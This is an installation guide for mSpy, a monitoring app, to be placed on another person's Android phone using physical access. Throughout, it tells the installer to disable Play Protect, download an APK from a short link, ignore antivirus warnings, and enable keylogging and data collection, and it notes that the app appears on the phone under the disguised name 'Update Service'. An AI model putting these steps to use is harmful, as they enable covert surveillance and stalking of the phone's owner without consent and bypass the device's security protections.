In order to install mSpy on the Android device (Samsung, Huawei, Xiaomi, LG, Motorola, etc.) that you want to monitor, you need to have physical access to the phone.
It is important to understand that due to the high level of customization of Android devices, the steps from the following guide might differ from what you will see on the actual phone. However, all the menu sections are similar, and you will be able to find your way through easily. For example, instead of ‘Applications’, you might see ‘Apps’, ‘Application manager’, or ‘Manage Application’.
Disable Play Protect
- Take the phone you want to monitor, make sure that it is unlocked, charged and connected to the Internet (Wi-Fi or mobile data)
- Go to Play Store
- Tap Menu button
- Find and tap Play Protect
- Tap Settings (cogwheel) in the upper right corner
- Disable Scan device for security threats
Download mSpy Installer
- Open a browser (Chrome)
- Tap the address bar
- Enter the link b55y.net/a and press Go
- Draw the shape, once successful click Download -> Ok
- If a prompt appears tap Open -> Settings -> Allow from this source and go back
- Tap Open
If mSpy (called Update Service on the phone) or mSpy installation file (called bt.apk) is detected by an antivirus you will be typically given two options: Resolve or Ignore (Skip).
If that happens press Ignore (Skip) and open bt.apk again or hit Install again.
- Tap Next
- Tap Next
- Tap Open
- Tick the checkbox Accept license agreement
- If a prompt appears tap Allow for all permissions
- Enable the first toggle (Allow keylogger tracking) ⭢ hit Ok
- Enable Framework update service (for Samsung: Installed services ⭢ enable Framework update service)
- Once enabled, click the back button in the bottom until you return to the installation screen
- Enable the second toggle (Allow collecting data) ⭢ hit Ok
- Find and tap Update Service ⭢ enable Allow usage tracking
- Once enabled, click the back button at the bottom until you return to the installation screen
- Click on the area above Complete installation and enter your Registration code from your mSpy account installation wizard
- Press Complete installation